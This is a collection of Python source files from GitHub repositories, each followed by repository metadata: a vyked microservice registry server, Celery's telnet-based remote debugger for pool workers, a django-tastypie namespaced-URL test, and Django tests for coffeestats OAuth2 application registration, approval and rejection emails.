        self.get_pending_instances(service, version).remove(node_id)
        if not self.get_pending_instances(service, version):
            self._pending_services.pop(self._get_full_service_name(service, version))

    def get_instances(self, service, version):
        """Return registered (host, port, node_id, type) entries for service/version."""
        service_name = self._get_full_service_name(service, version)
        return self._registered_services.get(service_name, [])

    def get_consumers(self, service_name, service_version):
        """Return the set of (name, version) services that depend on the
        given vendor service."""
        consumers = set()
        for service, vendors in self._service_dependencies.items():
            for each in vendors:
                if each['service'] == service_name and each['version'] == service_version:
                    consumers.add(self._split_key(service))
        return consumers

    def get_vendors(self, service, version):
        """Return the dependency descriptors declared by service/version."""
        return self._service_dependencies.get(self._get_full_service_name(service, version), [])

    def get_node(self, node_id):
        """Return a Service for *node_id*, or None when it is unknown."""
        for service, instances in self._registered_services.items():
            for host, port, node, service_type in instances:
                if node_id == node:
                    name, version = self._split_key(service)
                    return Service(name, version, [], host, port, node, service_type)
        return None

    def remove_node(self, node_id):
        """Remove every registered instance matching *node_id*.

        Iterates over a copy of each instance list: removing from a list
        while iterating it skips the element after the removed one.
        """
        for service, instances in self._registered_services.items():
            for instance in list(instances):
                if instance[2] == node_id:
                    instances.remove(instance)
        return None

    def xsubscribe(self, service, version, host, port, node_id, endpoints):
        """Register subscriptions of a service to the given event endpoints."""
        entry = (service, version, host, port, node_id)
        for endpoint in endpoints:
            self._subscribe_list[endpoint['service']][endpoint['version']][endpoint['endpoint']].append(
                entry + (endpoint['strategy'],))

    def get_subscribers(self, service, version, endpoint):
        """Return subscriber entries for the given service/version/endpoint."""
        return self._subscribe_list[service][version][endpoint]

    @staticmethod
    def _get_full_service_name(service, version):
        """Build the 'service/version' key used by the internal maps."""
        return '{}/{}'.format(service, version)

    @staticmethod
    def _split_key(key):
        """Split a 'service/version' key back into a (service, version) tuple."""
        return tuple(key.split('/'))
class Registry:
    """Asyncio TCP server that accepts service registrations, resolves
    dependencies, activates services, and notifies consumers when nodes
    appear or disappear."""

    def __init__(self, ip, port, repository):
        self._ip = ip
        self._port = port
        self._loop = asyncio.get_event_loop()
        self._client_protocols = {}   # node_id -> protocol of the registering client
        self._service_protocols = {}  # node_id -> protocol of our outbound connection
        self._repository = repository
        self._pingers = {}            # node_id -> TCPPinger / HTTPPinger

    def start(self):
        """Serve forever on (ip, port); SIGINT/SIGTERM stop the loop cleanly."""
        setup_logging("registry")
        self._loop.add_signal_handler(getattr(signal, 'SIGINT'), partial(self._stop, 'SIGINT'))
        self._loop.add_signal_handler(getattr(signal, 'SIGTERM'), partial(self._stop, 'SIGTERM'))
        registry_coroutine = self._loop.create_server(
            partial(get_vyked_protocol, self), self._ip, self._port)
        server = self._loop.run_until_complete(registry_coroutine)
        try:
            self._loop.run_forever()
        except Exception as e:
            print(e)
        finally:
            server.close()
            self._loop.run_until_complete(server.wait_closed())
            self._loop.close()

    def _stop(self, signame: str):
        """Signal handler: report the signal and stop the event loop."""
        print('\ngot signal {} - exiting'.format(signame))
        self._loop.stop()

    def receive(self, packet: dict, protocol, transport):
        """Dispatch an incoming control packet to its handler by 'type'."""
        request_type = packet['type']
        if request_type == 'register':
            self.register_service(packet, protocol, *transport.get_extra_info('peername'))
        elif request_type == 'get_instances':
            self.get_service_instances(packet, protocol)
        elif request_type == 'xsubscribe':
            self._xsubscribe(packet)
        elif request_type == 'get_subscribers':
            self.get_subscribers(packet, protocol)
        elif request_type == 'pong':
            self._ping(packet)
        elif request_type == 'ping':
            self._pong(packet, protocol)

    def deregister_service(self, node_id):
        """Forget *node_id*, notify its consumers and, if this was the last
        instance of the service, move its consumers back to pending."""
        service = self._repository.get_node(node_id)
        self._repository.remove_node(node_id)
        if service is not None:
            self._service_protocols.pop(node_id, None)
            self._client_protocols.pop(node_id, None)
            self._notify_consumers(service.name, service.version, node_id)
            if not len(self._repository.get_instances(service.name, service.version)):
                consumers = self._repository.get_consumers(service.name, service.version)
                for consumer_name, consumer_version in consumers:
                    for _, _, node_id, _ in self._repository.get_instances(consumer_name, consumer_version):
                        self._repository.add_pending_service(consumer_name, consumer_version, node_id)

    def register_service(self, packet: dict, registry_protocol, host, port):
        """Record a service registration and try to activate pending services."""
        params = packet['params']
        service = Service(params['service'], params['version'], params['vendors'], host, params['port'],
                          params['node_id'], params['type'])
        self._repository.register_service(service)
        self._client_protocols[params['node_id']] = registry_protocol
        self._connect_to_service(host, params['port'], params['node_id'], params['type'])
        self._handle_pending_registrations()

    def _send_activated_packet(self, service, version, node):
        """Tell *node* that service/version is activated (vendors available)."""
        protocol = self._client_protocols[node]
        packet = self._make_activated_packet(service, version)
        protocol.send(packet)

    def _handle_pending_registrations(self):
        """Activate every pending service whose vendors all have instances."""
        for service, version in self._repository.get_pending_services():
            vendors = self._repository.get_vendors(service, version)
            should_activate = True
            for vendor in vendors:
                if not len(self._repository.get_instances(vendor['service'], vendor['version'])):
                    should_activate = False
                    break
            for node in self._repository.get_pending_instances(service, version):
                if should_activate:
                    self._send_activated_packet(service, version, node)
                    self._repository.remove_pending_instance(service, version, node)
                    logger.info('%s activated', (service, version))
                else:
                    # 'vendor' is the dependency that broke the loop above.
                    logger.info('%s can\'t register because it depends on %s', (service, version), vendor)

    def _make_activated_packet(self, service, version):
        """Build an 'activated' packet carrying all vendor instances."""
        vendors = self._repository.get_vendors(service, version)
        instances = {
            (vendor['service'], vendor['version']): self._repository.get_instances(vendor['service'], vendor['version'])
            for vendor in vendors}
        return ControlPacket.activated(instances)

    def _connect_to_service(self, host, port, node_id, service_type):
        """Open a health-check channel to the service (TCP connect or HTTP ping)."""
        if service_type == 'tcp':
            coroutine = self._loop.create_connection(partial(get_vyked_protocol, self), host, port)
            # asyncio.async() is unusable on Python 3.7+ ('async' became a
            # keyword); ensure_future() is the drop-in replacement (3.4.4+).
            future = asyncio.ensure_future(coroutine)
            future.add_done_callback(partial(self._handle_service_connection, node_id))
        elif service_type == 'http':
            pinger = HTTPPinger(node_id, host, port, self)
            self._pingers[node_id] = pinger
            pinger.ping()

    def _handle_service_connection(self, node_id, future):
        """Connection established: remember the protocol and start pinging."""
        transport, protocol = future.result()
        self._service_protocols[node_id] = protocol
        pinger = TCPPinger(node_id, protocol, self)
        self._pingers[node_id] = pinger
        pinger.ping()

    def _notify_consumers(self, service, version, node_id):
        """Send a deregister packet to every instance of every consumer."""
        packet = ControlPacket.deregister(service, version, node_id)
        for consumer_name, consumer_version in self._repository.get_consumers(service, version):
            for host, port, node, service_type in self._repository.get_instances(consumer_name, consumer_version):
                protocol = self._client_protocols[node]
                protocol.send(packet)

    def get_service_instances(self, packet, registry_protocol):
        """Answer a 'get_instances' request over the given protocol."""
        params = packet['params']
        service, version = params['service'], params['version']
        instances = self._repository.get_consumers(service, version)
        instance_packet = ControlPacket.send_instances(service, version, instances)
        registry_protocol.send(instance_packet)

    def get_subscribers(self, packet, protocol):
        """Answer a 'get_subscribers' request over the given protocol."""
        params = packet['params']
        request_id = packet['request_id']
        service, version, endpoint = params['service'], params['version'], params['endpoint']
        subscribers = self._repository.get_subscribers(service, version, endpoint)
        packet = ControlPacket.subscribers(service, version, endpoint, request_id, subscribers)
        protocol.send(packet)

    def on_timeout(self, node_id):
        """Ping timeout callback: drop the unresponsive node."""
        self.deregister_service(node_id)

    def _ping(self, packet):
        """A 'pong' arrived: let the node's pinger schedule the next ping."""
        pinger = self._pingers[packet['node_id']]
        pinger.pong_received()

    def _pong(self, packet, protocol):
        """Answer a 'ping' from a service with a 'pong'."""
        protocol.send(ControlPacket.pong(packet['node_id']))

    def _xsubscribe(self, packet):
        """Record event subscriptions announced by a service."""
        params = packet['params']
        service, version, host, port, node_id = params['service'], params['version'], params['host'], params['port'], params['node_id']
        endpoints = params['events']
        self._repository.xsubscribe(service, version, host, port, node_id, endpoints)
if __name__ == '__main__':
    # Stand-alone entry point: run a registry with ping logging enabled.
    config_logs(enable_ping_logs=True, log_level=logging.DEBUG)
    from setproctitle import setproctitle
    setproctitle("registry")
    # host=None lets asyncio's create_server bind on all interfaces.
    REGISTRY_HOST = None
    REGISTRY_PORT = 4500
    registry = Registry(REGISTRY_HOST, REGISTRY_PORT, Repository())
    registry.start()
| {
"content_hash": "f0df09b9da58beb8ac9eef6f566caa60",
"timestamp": "",
"source": "github",
"line_count": 252,
"max_line_length": 136,
"avg_line_length": 45.46825396825397,
"alnum_prop": 0.6356257636585791,
"repo_name": "pankajnits/vyked",
"id": "733215238ec567d4d2cae2082f09678f6ab2952d",
"size": "11458",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "vyked/registry.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "81387"
}
],
"symlink_target": ""
} |
"""Remote Debugger.
Introduction
============
This is a remote debugger for Celery tasks running in multiprocessing
pool workers. Inspired by a lost post on dzone.com.
Usage
-----
.. code-block:: python
from celery.contrib import rdb
from celery import task
@task()
def add(x, y):
result = x + y
rdb.set_trace()
return result
Environment Variables
=====================
.. envvar:: CELERY_RDB_HOST
``CELERY_RDB_HOST``
-------------------
Hostname to bind to. Default is '127.0.0.1' (only accessible from
localhost).
.. envvar:: CELERY_RDB_PORT
``CELERY_RDB_PORT``
-------------------
Base port to bind to. Default is 6899.
The debugger will try to find an available port starting from the
base port. The selected port will be logged by the worker.
"""
from __future__ import absolute_import, print_function, unicode_literals
import errno
import os
import socket
import sys
from pdb import Pdb
from billiard.process import current_process
from celery.five import range
__all__ = (
    'CELERY_RDB_HOST', 'CELERY_RDB_PORT', 'DEFAULT_PORT',
    'Rdb', 'debugger', 'set_trace',
)
#: Base port the debugger probes from when CELERY_RDB_PORT is unset.
DEFAULT_PORT = 6899
#: Bind host; loopback by default so sessions are only reachable locally.
CELERY_RDB_HOST = os.environ.get('CELERY_RDB_HOST') or '127.0.0.1'
CELERY_RDB_PORT = int(os.environ.get('CELERY_RDB_PORT') or DEFAULT_PORT)
#: Holds the currently active debugger.
_current = [None]
#: sys._getframe, fetched via getattr (it is a CPython implementation detail).
_frame = getattr(sys, '_getframe')
# The templates below are .format()-ed with self=<Rdb instance>.
NO_AVAILABLE_PORT = """\
{self.ident}: Couldn't find an available port.
Please specify one using the CELERY_RDB_PORT environment variable.
"""
BANNER = """\
{self.ident}: Ready to connect: telnet {self.host} {self.port}
Type `exit` in session to continue.
{self.ident}: Waiting for client...
"""
SESSION_STARTED = '{self.ident}: Now in session with {self.remote_addr}.'
SESSION_ENDED = '{self.ident}: Session with {self.remote_addr} ended.'
class Rdb(Pdb):
    """Remote debugger: a Pdb whose session is served over a TCP socket.

    The constructor binds a free port, blocks until a client (e.g. telnet)
    connects, then redirects ``sys.stdin``/``sys.stdout`` through the
    socket so the standard Pdb machinery talks to the remote client.
    """

    me = 'Remote Debugger'
    _prev_outs = None
    _sock = None

    def __init__(self, host=CELERY_RDB_HOST, port=CELERY_RDB_PORT,
                 port_search_limit=100, port_skew=+0, out=sys.stdout):
        self.active = True
        self.out = out
        # Remember the real stdin/stdout so _close_session can restore them.
        self._prev_handles = sys.stdin, sys.stdout
        self._sock, this_port = self.get_avail_port(
            host, port, port_search_limit, port_skew,
        )
        self._sock.setblocking(1)
        self._sock.listen(1)
        self.ident = '{0}:{1}'.format(self.me, this_port)
        self.host = host
        self.port = this_port
        self.say(BANNER.format(self=self))
        # Blocks here until a client connects.
        self._client, address = self._sock.accept()
        self._client.setblocking(1)
        self.remote_addr = ':'.join(str(v) for v in address)
        self.say(SESSION_STARTED.format(self=self))
        # Route the process-wide stdin/stdout through the client socket so
        # Pdb's prompt and command input go to/come from the remote side.
        self._handle = sys.stdin = sys.stdout = self._client.makefile('rw')
        Pdb.__init__(self, completekey='tab',
                     stdin=self._handle, stdout=self._handle)

    def get_avail_port(self, host, port, search_limit=100, skew=+0):
        """Bind and return ``(socket, port)`` for the first free port at or
        above ``port + skew``; raise when *search_limit* ports are taken."""
        try:
            # Process names like 'PoolWorker-3' carry a numeric suffix; use
            # it as the port skew so each pool worker gets a distinct port.
            _, skew = current_process().name.split('-')
            skew = int(skew)
        except ValueError:
            pass
        this_port = None
        for i in range(search_limit):
            _sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            _sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            this_port = port + skew + i
            try:
                _sock.bind((host, this_port))
            except socket.error as exc:
                # Port taken (or invalid on this platform): try the next one.
                if exc.errno in [errno.EADDRINUSE, errno.EINVAL]:
                    continue
                raise
            else:
                return _sock, this_port
        else:
            raise Exception(NO_AVAILABLE_PORT.format(self=self))

    def say(self, m):
        """Print *m* to the local (non-redirected) output stream."""
        print(m, file=self.out)

    def __enter__(self):
        return self

    def __exit__(self, *exc_info):
        self._close_session()

    def _close_session(self):
        """Restore stdin/stdout and tear down the socket. Idempotent."""
        self.stdin, self.stdout = sys.stdin, sys.stdout = self._prev_handles
        if self.active:
            if self._handle is not None:
                self._handle.close()
            if self._client is not None:
                self._client.close()
            if self._sock is not None:
                self._sock.close()
            self.active = False
            self.say(SESSION_ENDED.format(self=self))

    def do_continue(self, arg):
        """'continue': end the remote session, then resume execution."""
        self._close_session()
        self.set_continue()
        return 1
    do_c = do_cont = do_continue

    def do_quit(self, arg):
        """'quit'/'exit': end the remote session, then stop the program."""
        self._close_session()
        self.set_quit()
        return 1
    do_q = do_exit = do_quit

    def set_quit(self):
        # this raises a BdbQuit exception that we're unable to catch.
        sys.settrace(None)
def debugger():
    """Return the currently active debugger, creating a new one if needed."""
    instance = _current[0]
    if instance is not None and instance.active:
        return instance
    instance = _current[0] = Rdb()
    return instance
def set_trace(frame=None):
    """Set a break-point at *frame*, defaulting to the caller's frame."""
    target = _frame().f_back if frame is None else frame
    return debugger().set_trace(target)
| {
"content_hash": "4ecb473ebbc0742723baea826836c0fd",
"timestamp": "",
"source": "github",
"line_count": 192,
"max_line_length": 76,
"avg_line_length": 26.78125,
"alnum_prop": 0.5902372617658499,
"repo_name": "cloudera/hue",
"id": "019455000ef4eb4303007817e5c8eacd50f2d3e3",
"size": "5166",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "desktop/core/ext-py/celery-4.2.1/celery/contrib/rdb.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ABAP",
"bytes": "962"
},
{
"name": "ActionScript",
"bytes": "1133"
},
{
"name": "Ada",
"bytes": "99"
},
{
"name": "Assembly",
"bytes": "2347"
},
{
"name": "AutoHotkey",
"bytes": "720"
},
{
"name": "BASIC",
"bytes": "2884"
},
{
"name": "Batchfile",
"bytes": "143575"
},
{
"name": "C",
"bytes": "5129166"
},
{
"name": "C#",
"bytes": "83"
},
{
"name": "C++",
"bytes": "718011"
},
{
"name": "COBOL",
"bytes": "4"
},
{
"name": "CSS",
"bytes": "680715"
},
{
"name": "Cirru",
"bytes": "520"
},
{
"name": "Clojure",
"bytes": "794"
},
{
"name": "Closure Templates",
"bytes": "1072"
},
{
"name": "CoffeeScript",
"bytes": "403"
},
{
"name": "ColdFusion",
"bytes": "86"
},
{
"name": "Common Lisp",
"bytes": "632"
},
{
"name": "Cython",
"bytes": "1016963"
},
{
"name": "D",
"bytes": "324"
},
{
"name": "Dart",
"bytes": "489"
},
{
"name": "Dockerfile",
"bytes": "13576"
},
{
"name": "EJS",
"bytes": "752"
},
{
"name": "Eiffel",
"bytes": "375"
},
{
"name": "Elixir",
"bytes": "692"
},
{
"name": "Elm",
"bytes": "487"
},
{
"name": "Emacs Lisp",
"bytes": "411907"
},
{
"name": "Erlang",
"bytes": "487"
},
{
"name": "Forth",
"bytes": "979"
},
{
"name": "FreeMarker",
"bytes": "1017"
},
{
"name": "G-code",
"bytes": "521"
},
{
"name": "GAP",
"bytes": "29873"
},
{
"name": "GLSL",
"bytes": "512"
},
{
"name": "Genshi",
"bytes": "946"
},
{
"name": "Gherkin",
"bytes": "699"
},
{
"name": "Go",
"bytes": "641"
},
{
"name": "Groovy",
"bytes": "1080"
},
{
"name": "HTML",
"bytes": "28328425"
},
{
"name": "Haml",
"bytes": "920"
},
{
"name": "Handlebars",
"bytes": "173"
},
{
"name": "Haskell",
"bytes": "512"
},
{
"name": "Haxe",
"bytes": "447"
},
{
"name": "HiveQL",
"bytes": "43"
},
{
"name": "Io",
"bytes": "140"
},
{
"name": "Java",
"bytes": "457398"
},
{
"name": "JavaScript",
"bytes": "39181239"
},
{
"name": "Jinja",
"bytes": "356"
},
{
"name": "Julia",
"bytes": "210"
},
{
"name": "LSL",
"bytes": "2080"
},
{
"name": "Lean",
"bytes": "213"
},
{
"name": "Less",
"bytes": "396102"
},
{
"name": "Lex",
"bytes": "218764"
},
{
"name": "Liquid",
"bytes": "1883"
},
{
"name": "LiveScript",
"bytes": "5747"
},
{
"name": "Lua",
"bytes": "78382"
},
{
"name": "M4",
"bytes": "1751"
},
{
"name": "MATLAB",
"bytes": "203"
},
{
"name": "Makefile",
"bytes": "1025937"
},
{
"name": "Mako",
"bytes": "3644004"
},
{
"name": "Mask",
"bytes": "597"
},
{
"name": "Myghty",
"bytes": "936"
},
{
"name": "Nix",
"bytes": "2212"
},
{
"name": "OCaml",
"bytes": "539"
},
{
"name": "Objective-C",
"bytes": "2672"
},
{
"name": "OpenSCAD",
"bytes": "333"
},
{
"name": "PHP",
"bytes": "662"
},
{
"name": "PLSQL",
"bytes": "29403"
},
{
"name": "PLpgSQL",
"bytes": "6006"
},
{
"name": "Pascal",
"bytes": "84273"
},
{
"name": "Perl",
"bytes": "4327"
},
{
"name": "PigLatin",
"bytes": "371"
},
{
"name": "PowerShell",
"bytes": "6235"
},
{
"name": "Procfile",
"bytes": "47"
},
{
"name": "Pug",
"bytes": "584"
},
{
"name": "Python",
"bytes": "92881549"
},
{
"name": "R",
"bytes": "2445"
},
{
"name": "Roff",
"bytes": "484108"
},
{
"name": "Ruby",
"bytes": "1098"
},
{
"name": "Rust",
"bytes": "495"
},
{
"name": "SCSS",
"bytes": "78508"
},
{
"name": "Sass",
"bytes": "770"
},
{
"name": "Scala",
"bytes": "1541"
},
{
"name": "Scheme",
"bytes": "559"
},
{
"name": "Shell",
"bytes": "249165"
},
{
"name": "Smarty",
"bytes": "130"
},
{
"name": "SourcePawn",
"bytes": "948"
},
{
"name": "Stylus",
"bytes": "682"
},
{
"name": "Tcl",
"bytes": "899"
},
{
"name": "TeX",
"bytes": "165743"
},
{
"name": "Thrift",
"bytes": "341963"
},
{
"name": "Twig",
"bytes": "761"
},
{
"name": "TypeScript",
"bytes": "1241396"
},
{
"name": "VBScript",
"bytes": "938"
},
{
"name": "VHDL",
"bytes": "830"
},
{
"name": "Vala",
"bytes": "485"
},
{
"name": "Verilog",
"bytes": "274"
},
{
"name": "Vim Snippet",
"bytes": "226931"
},
{
"name": "Vue",
"bytes": "350385"
},
{
"name": "XQuery",
"bytes": "114"
},
{
"name": "XSLT",
"bytes": "522199"
},
{
"name": "Yacc",
"bytes": "1070437"
},
{
"name": "jq",
"bytes": "4"
}
],
"symlink_target": ""
} |
try:
from django.urls import reverse, NoReverseMatch
except ImportError:
from django.core.urlresolvers import reverse, NoReverseMatch
from django.test.utils import override_settings
from testcases import TestCaseWithFixture
@override_settings(ROOT_URLCONF='namespaced.api.urls')
class NamespacedViewsTestCase(TestCaseWithFixture):
    """Verify URL pattern generation and reversal for a namespaced Api."""

    def test_urls(self):
        from namespaced.api.urls import api
        patterns = api.urls
        # The Api exposes the top-level view plus one include per resource.
        self.assertEqual(len(patterns), 3)
        self.assertEqual(sorted([pattern.name for pattern in patterns if hasattr(pattern, 'name')]), ['api_v1_top_level'])
        self.assertEqual([[pattern.name for pattern in include.url_patterns if hasattr(pattern, 'name')] for include in patterns if hasattr(include, 'reverse_dict')], [['api_dispatch_list', 'api_get_schema', 'api_get_multiple', 'api_dispatch_detail'], ['api_dispatch_list', 'api_get_schema', 'api_get_multiple', 'api_dispatch_detail']])
        # Reversal only works inside the namespace and with the api_name kwarg.
        self.assertRaises(NoReverseMatch, reverse, 'api_v1_top_level')
        self.assertRaises(NoReverseMatch, reverse, 'special:api_v1_top_level')
        # assertEquals is a deprecated alias that was removed in Python 3.12;
        # use the canonical assertEqual instead.
        self.assertEqual(reverse('special:api_v1_top_level', kwargs={'api_name': 'v1'}), '/api/v1/')
        self.assertEqual(reverse('special:api_dispatch_list', kwargs={'api_name': 'v1', 'resource_name': 'notes'}), '/api/v1/notes/')
| {
"content_hash": "fcb00336f8aa477690f5e0c8aca5c655",
"timestamp": "",
"source": "github",
"line_count": 22,
"max_line_length": 336,
"avg_line_length": 60.45454545454545,
"alnum_prop": 0.7157894736842105,
"repo_name": "beedesk/django-tastypie",
"id": "69f92074b87a05a86d79e29c0d4f48b4b4fe490b",
"size": "1330",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "tests/namespaced/tests.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "988"
},
{
"name": "Python",
"bytes": "804357"
},
{
"name": "Shell",
"bytes": "1162"
}
],
"symlink_target": ""
} |
from django.conf import settings
from django.contrib.auth import get_user_model
from django.contrib.sites.shortcuts import get_current_site
from django.core import mail
from django.urls import reverse
from django.http import HttpResponseRedirect
from django.test import TransactionTestCase
from caffeine_oauth2.models import CoffeestatsApplication
from caffeine_oauth2.views import CoffeestatsApplicationRegistration
User = get_user_model()
class CoffeestatsApplicationRegistrationTest(TransactionTestCase):
    """Tests for the custom OAuth2 application registration view."""

    def test_get_form_class(self):
        """The registration view must build its form for CoffeestatsApplication."""
        view = CoffeestatsApplicationRegistration()
        form_class = view.get_form_class()
        self.assertIsNotNone(form_class)
        self.assertEqual(form_class.Meta.model, CoffeestatsApplication)

    def setUp(self):
        # A logged-in regular user who will request the API client.
        self.user = User.objects.create_user(
            'tester', 'tester@example.org', timezone='Europe/Berlin',
            is_active=True)
        # Valid form payload registering a public, implicit-grant client.
        self.post_data = {
            'agree': True, 'website': 'http://foo.example.org/',
            'client_type': CoffeestatsApplication.CLIENT_PUBLIC,
            'name': 'The foo coffeestats API client',
            'description': 'A foo client from the knights of foo',
            'client_id': 'test_id',
            'authorization_grant_type': CoffeestatsApplication.GRANT_IMPLICIT,
            'redirect_uris': 'http://localhost:8001/',
        }
        self.client.force_login(self.user)

    def test_register_application_template(self):
        """GET renders the application registration form template."""
        response = self.client.get(reverse('oauth2_provider:register'))
        self.assertTemplateUsed(
            response, 'oauth2_provider/application_registration_form.html')

    def test_valid_application_redirect(self):
        """A valid POST redirects to the new application's detail page."""
        response = self.client.post(
            reverse('oauth2_provider:register'), data=self.post_data)
        # check that the response is a redirect to the pending application
        # page
        self.assertIsNotNone(response)
        self.assertIn('application', response.context)
        self.assertIsInstance(response, HttpResponseRedirect)
        self.assertEqual(response.url, reverse(
            'oauth2_provider:detail',
            kwargs={'pk': response.context['application'].id}))

    def test_valid_application_use_pending_template(self):
        """Following the redirect lands on the pending-approval template."""
        response = self.client.post(
            reverse('oauth2_provider:register'), data=self.post_data,
            follow=True)
        self.assertIsNotNone(response)
        self.assertTemplateUsed('caffeine_oauth2/pending_approval.html')

    def test_valid_application_email_to_staff(self):
        """Registration sends one notification mail to all site admins."""
        response = self.client.post(
            reverse('oauth2_provider:register'), data=self.post_data)
        self.assertEqual(len(mail.outbox), 1)
        mail_item = mail.outbox[0]
        current_site = get_current_site(response.request)
        application = response.context['application']
        approval_url = reverse('oauth2_provider:approve',
                               kwargs={'pk': application.id})
        self.assertEqual(
            mail_item.subject,
            '[{}] A new API client {} has been requested'.format(
                current_site.name, application.name
            ))
        # Exactly one HTML alternative alongside the plain-text body.
        self.assertEqual(len(mail_item.alternatives), 1)
        self.assertEqual(mail_item.alternatives[0][1], 'text/html')
        text_content = str(mail_item.body)
        html_content = str(mail_item.alternatives[0][0])
        # Both bodies must mention the application details and approval link.
        for content in (application.name, application.description,
                        str(self.user), application.website, approval_url):
            self.assertIn(content, text_content)
            self.assertIn(content, html_content)
        self.assertEqual(mail_item.from_email, settings.DEFAULT_FROM_EMAIL)
        self.assertEqual(len(mail_item.to), len(settings.ADMINS))
        for recipient in [admin[1] for admin in settings.ADMINS]:
            self.assertIn(recipient, mail_item.to)
class CoffeestatsApplicationApprovalTest(TransactionTestCase):
    """Tests for the staff-only application approval view."""

    def setUp(self):
        # The applicant who owns the pending application.
        self.appuser = User.objects.create_user(
            'appuser', 'appuser@example.org')
        self.application = CoffeestatsApplication.objects.create(
            user=self.appuser, agree=False, website='http://foo.example.org/',
            client_type=CoffeestatsApplication.CLIENT_PUBLIC,
            name='The foo coffeestats API client',
            description='A foo client from the knights of foo',
            authorization_grant_type=CoffeestatsApplication.GRANT_IMPLICIT,
            redirect_uris='http://localhost:8001/'
        )
        # Form payload the approving admin may edit before approval.
        self.post_data = {
            'name': 'The foo API client',
            'description': 'Third party foo client from the knights of foo',
            'website': self.application.website,
            'client_type': self.application.client_type,
            'authorization_grant_type': CoffeestatsApplication.GRANT_IMPLICIT,
        }
        # Approval requires a logged-in superuser.
        self.user = User.objects.create_superuser(
            username='admin', email='coffeestats@example.org',
            password='s3cr3t', timezone='Europe/Berlin')
        self.client.force_login(self.user)

    def test_approve_application_template(self):
        """GET renders the approval form template."""
        response = self.client.get(reverse(
            'oauth2_provider:approve', kwargs={'pk': self.application.id}))
        self.assertTemplateUsed(response, 'caffeine_oauth2/approve.html')

    def test_valid_approval_redirect(self):
        """A valid approval POST redirects to the full application list."""
        response = self.client.post(reverse(
            'oauth2_provider:approve', kwargs={'pk': self.application.id}),
            data=self.post_data)
        # check that the response is a redirect to the application list page
        self.assertIsNotNone(response)
        self.assertIsInstance(response, HttpResponseRedirect)
        self.assertEqual(response.url, reverse('oauth2_provider:list_all'))

    def test_valid_approval_email_to_applicant(self):
        """Approval sends one notification mail to the applicant."""
        response = self.client.post(reverse(
            'oauth2_provider:approve', kwargs={'pk': self.application.id}),
            data=self.post_data)
        self.assertEqual(len(mail.outbox), 1)
        mail_item = mail.outbox[0]
        current_site = get_current_site(response.request)
        detail_url = reverse('oauth2_provider:detail',
                             kwargs={'pk': self.application.id})
        # Subject uses the (possibly edited) name from the approval form.
        self.assertEqual(
            mail_item.subject,
            '[{}] Your API client {} has been approved'.format(
                current_site.name, self.post_data['name'],
            )
        )
        # Exactly one HTML alternative alongside the plain-text body.
        self.assertEqual(len(mail_item.alternatives), 1)
        self.assertEqual(mail_item.alternatives[0][1], 'text/html')
        text_content = str(mail_item.body)
        html_content = str(mail_item.alternatives[0][0])
        # Both bodies link to the application detail page and name the client.
        for content in (detail_url, self.post_data['name']):
            self.assertIn(content, text_content)
            self.assertIn(content, html_content)
        self.assertEqual(mail_item.from_email, settings.DEFAULT_FROM_EMAIL)
        self.assertEqual(len(mail_item.to), 1)
        self.assertIn(self.appuser.email, mail_item.to)
class CoffeestatsApplicationRejectionTest(TransactionTestCase):
    """Tests for the OAuth2 application rejection view."""

    def setUp(self):
        # applicant and a pending application to reject
        self.appuser = User.objects.create_user(
            'appuser', 'appuser@example.org')
        self.application = CoffeestatsApplication.objects.create(
            user=self.appuser, agree=False, website='http://foo.example.org/',
            client_type=CoffeestatsApplication.CLIENT_PUBLIC,
            name='The foo coffeestats API client',
            description='A foo client from the knights of foo',
            authorization_grant_type=CoffeestatsApplication.GRANT_IMPLICIT,
            redirect_uris='http://localhost:8001/'
        )
        # rejection reasoning submitted by the admin
        self.post_data = {
            'reasoning': 'It sucks! Really this is not a good idea.',
        }
        self.user = User.objects.create_superuser(
            username='admin', email='coffeestats@example.org',
            password='s3cr3t', timezone='Europe/Berlin')
        self.client.force_login(self.user)

    def _rejection_url(self):
        """URL of the rejection view for the application under test."""
        return reverse('oauth2_provider:reject',
                       kwargs={'pk': self.application.id})

    def _reject(self):
        """Submit the rejection form and return the response."""
        return self.client.post(self._rejection_url(), data=self.post_data)

    def test_approve_application_template(self):
        response = self.client.get(self._rejection_url())
        self.assertTemplateUsed(response, 'caffeine_oauth2/reject.html')

    def test_valid_reject_redirect(self):
        # a successful rejection redirects to the application list page
        response = self._reject()
        self.assertIsNotNone(response)
        self.assertIsInstance(response, HttpResponseRedirect)
        self.assertEqual(response.url, reverse('oauth2_provider:list_all'))

    def test_valid_reject_email_to_applicant(self):
        response = self._reject()
        # rejection deletes the application record
        with self.assertRaises(CoffeestatsApplication.DoesNotExist):
            CoffeestatsApplication.objects.get(pk=self.application.id)
        self.assertEqual(len(mail.outbox), 1)
        message = mail.outbox[0]
        current_site = get_current_site(response.request)
        self.assertEqual(
            message.subject,
            '[{}] Your API client {} has been rejected'.format(
                current_site.name, self.application.name))
        # exactly one HTML alternative alongside the plain-text body
        self.assertEqual(len(message.alternatives), 1)
        self.assertEqual(message.alternatives[0][1], 'text/html')
        text_content = str(message.body)
        html_content = str(message.alternatives[0][0])
        for snippet in (self.application.name, self.post_data['reasoning']):
            self.assertIn(snippet, text_content)
            self.assertIn(snippet, html_content)
        self.assertEqual(message.from_email, settings.DEFAULT_FROM_EMAIL)
        self.assertEqual(len(message.to), 1)
        self.assertIn(self.appuser.email, message.to)
| {
"content_hash": "eb74d0f8c17209c42c8664e98fb4cb47",
"timestamp": "",
"source": "github",
"line_count": 209,
"max_line_length": 78,
"avg_line_length": 47.110047846889955,
"alnum_prop": 0.6478773105829778,
"repo_name": "coffeestats/coffeestats-django",
"id": "51095f02b70bd214520ac9211ae19e5e31018e94",
"size": "9846",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "coffeestats/caffeine_oauth2/tests/test_views.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "62461"
},
{
"name": "Dockerfile",
"bytes": "881"
},
{
"name": "HTML",
"bytes": "106689"
},
{
"name": "JavaScript",
"bytes": "45668"
},
{
"name": "Python",
"bytes": "279433"
},
{
